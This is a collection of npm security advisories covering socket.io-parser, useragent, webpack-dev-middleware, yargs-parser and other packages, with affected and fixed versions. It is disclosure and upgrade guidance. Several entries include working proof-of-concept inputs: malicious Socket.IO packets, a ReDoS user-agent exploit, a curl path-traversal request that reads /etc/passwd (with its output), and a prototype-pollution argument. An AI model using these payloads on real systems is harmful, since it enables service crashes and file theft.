This affects the package xmlhttprequest before 1.7.0; all versions of package xmlhttprequest-ssl. Provided requests are sent synchronously (async=False
on xhr.open
), malicious user input flowing into xhr.send
could result in arbitrary code being injected and run.
Insufficient validation when decoding a Socket.IO packet
A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process.
TypeError: Cannot convert object to primitive value
at Socket.emit (node:events:507:25)
at .../node_modules/socket.io/lib/socket.js:531:14
A fix has been released today (2023/05/22):
socket.io-parser@4.2.3
socket.io-parser@3.4.3
Another fix has been released for the 3.3.x
branch:
| socket.io
version | socket.io-parser
version | Needs minor update? |
|---------------------|---------------------------------------------------------------------------------------------------------|--------------------------------------|
| 4.5.2...latest
| ~4.2.0
(ref) | npm audit fix
should be sufficient |
| 4.1.3...4.5.1
| ~4.1.1
(ref) | Please upgrade to socket.io@4.6.x
|
| 3.0.5...4.1.2
| ~4.0.3
(ref) | Please upgrade to socket.io@4.6.x
|
| 3.0.0...3.0.4
| ~4.0.1
(ref) | Please upgrade to socket.io@4.6.x
|
| 2.3.0...2.5.0
| ~3.4.0
(ref) | npm audit fix
should be sufficient |
There is no known workaround except upgrading to a safe version.
If you have any questions or comments about this advisory:
Thanks to @rafax00 for the responsible disclosure.
Insufficient validation when decoding a Socket.IO packet
Due to improper type validation in the socket.io-parser
library (which is used by the socket.io
and socket.io-client
packages to encode and decode Socket.IO packets), it is possible to overwrite the _placeholder object which allows an attacker to place references to functions at arbitrary places in the resulting query object.
Example:
const decoder = new Decoder();
decoder.on("decoded", (packet) => {
console.log(packet.data); // prints [ 'hello', [Function: splice] ]
})
decoder.add('51-["hello",{"_placeholder":true,"num":"splice"}]');
decoder.add(Buffer.from("world"));
This bubbles up in the socket.io
package:
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// here, "val" could be a function instead of a buffer
});
});
:warning: IMPORTANT NOTE :warning:
You need to make sure that the payload that you received from the client is actually a Buffer
object:
io.on("connection", (socket) => {
socket.on("hello", (val) => {
if (!Buffer.isBuffer(val)) {
socket.disconnect();
return;
}
// ...
});
});
If that's already the case, then you are not impacted by this issue, and there is no way an attacker could make your server crash (or escalate privileges, ...).
Example of values that could be sent by a malicious user:
Sample packet: 451-["hello",{"_placeholder":true,"num":10}]
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// val is `undefined`
});
});
undefined
Sample packet: 451-["hello",{"_placeholder":true,"num":undefined}]
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// val is `undefined`
});
});
Array
, like "push"Sample packet: 451-["hello",{"_placeholder":true,"num":"push"}]
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// val is a reference to the "push" function
});
});
Object
, like "hasOwnProperty"Sample packet: 451-["hello",{"_placeholder":true,"num":"hasOwnProperty"}]
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// val is a reference to the "hasOwnProperty" function
});
});
This should be fixed by:
socket.io-parser@4.2.1
socket.io-parser@4.0.5
socket.io-parser@3.4.2
socket.io-parser@3.3.3
socket.io
package| socket.io
version | socket.io-parser
version | Covered? |
|---------------------|---------------------------------------------------------------------------------------------------------|------------------------|
| 4.5.2...latest
| ~4.2.0
(ref) | Yes :heavy_check_mark: |
| 4.1.3...4.5.1
| ~4.0.4
(ref) | Yes :heavy_check_mark: |
| 3.0.5...4.1.2
| ~4.0.3
(ref) | Yes :heavy_check_mark: |
| 3.0.0...3.0.4
| ~4.0.1
(ref) | Yes :heavy_check_mark: |
| 2.3.0...2.5.0
| ~3.4.0
(ref) | Yes :heavy_check_mark: |
socket.io-client
package| socket.io-client
version | socket.io-parser
version | Covered? |
|----------------------------|----------------------------------------------------------------------------------------------------------------|------------------------------------|
| 4.5.0...latest
| ~4.2.0
(ref) | Yes :heavy_check_mark: |
| 4.3.0...4.4.1
| ~4.1.1
(ref) | No, but the impact is very limited |
| 3.1.0...4.2.0
| ~4.0.4
(ref) | Yes :heavy_check_mark: |
| 3.0.5
| ~4.0.3
(ref) | Yes :heavy_check_mark: |
| 3.0.0...3.0.4
| ~4.0.1
(ref) | Yes :heavy_check_mark: |
| 2.2.0...2.5.0
| ~3.3.0
(ref) | Yes :heavy_check_mark: |
Resource exhaustion in socket.io-parser
The socket.io-parser
npm package before versions 3.3.2 and 3.4.1 allows attackers to cause a denial of service (memory consumption) via a large packet because a concatenation approach is used.
useragent Regular Expression Denial of Service vulnerability
Useragent is a user agent parser for Node.js. All versions as of time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS).
async function exploit() {
const useragent = require(\"useragent\");
// Create a malicious user-agent that leads to excessive backtracking
const maliciousUserAgent = 'Mozilla/5.0 (' + 'X'.repeat(30000) + ') Gecko/20100101 Firefox/77.0';
// Parse the malicious user-agent
const agent = useragent.parse(maliciousUserAgent);
// Call the toString method to trigger the vulnerability
const result = await agent.device.toString();
console.log(result);
}
await exploit();
Path traversal in webpack-dev-middleware
The webpack-dev-middleware middleware does not validate the supplied URL address sufficiently before returning the local file. It is possible to access any file on the developer's machine.
The middleware can either work with the physical filesystem when reading the files or it can use a virtualized in-memory memfs filesystem. If writeToDisk configuration option is set to true, the physical filesystem is used: https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/setupOutputFileSystem.js#L21
The getFilenameFromUrl method is used to parse URL and build the local file path. The public path prefix is stripped from the URL, and the unsecaped path suffix is appended to the outputPath: https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/getFilenameFromUrl.js#L82 As the URL is not unescaped and normalized automatically before calling the midlleware, it is possible to use %2e and %2f sequences to perform path traversal attack.
A blank project can be created containing the following configuration file webpack.config.js:
module.exports = { devServer: { devMiddleware: { writeToDisk: true } } };
When started, it is possible to access any local file, e.g. /etc/passwd:
$ curl localhost:8080/public/..%2f..%2f..%2f..%2f../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
The developers using webpack-dev-server or webpack-dev-middleware are affected by the issue. When the project is started, an attacker might access any file on the developer's machine and exfiltrate the content (e.g. password, configuration files, private source code, ...).
If the development server is listening on a public IP address (or 0.0.0.0), an attacker on the local network can access the local files without any interaction from the victim (direct connection to the port).
If the server allows access from third-party domains (CORS, Allow-Access-Origin: * ), an attacker can send a malicious link to the victim. When visited, the client side script can connect to the local server and exfiltrate the local files.
The URL should be unescaped and normalized before any further processing.
Regular Expression Denial of Service (ReDoS) in cross-spawn
Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.
Denial of Service in mem
Versions of mem
prior to 4.0.0 are vulnerable to Denial of Service (DoS). The package fails to remove old values from the cache even after a value passes its maxAge
property. This may allow attackers to exhaust the system's memory if they are able to abuse the application logging.
Upgrade to version 4.0.0 or later.
yargs-parser Vulnerable to Prototype Pollution
Affected versions of yargs-parser
are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of Object
, causing the addition or modification of an existing property that will exist on all objects.
Parsing the argument --foo.__proto__.bar baz'
adds a bar
property with value baz
to all objects. This is only exploitable if attackers have control over the arguments being passed to yargs-parser
.
Upgrade to versions 13.1.2, 15.0.1, 18.1.1 or later.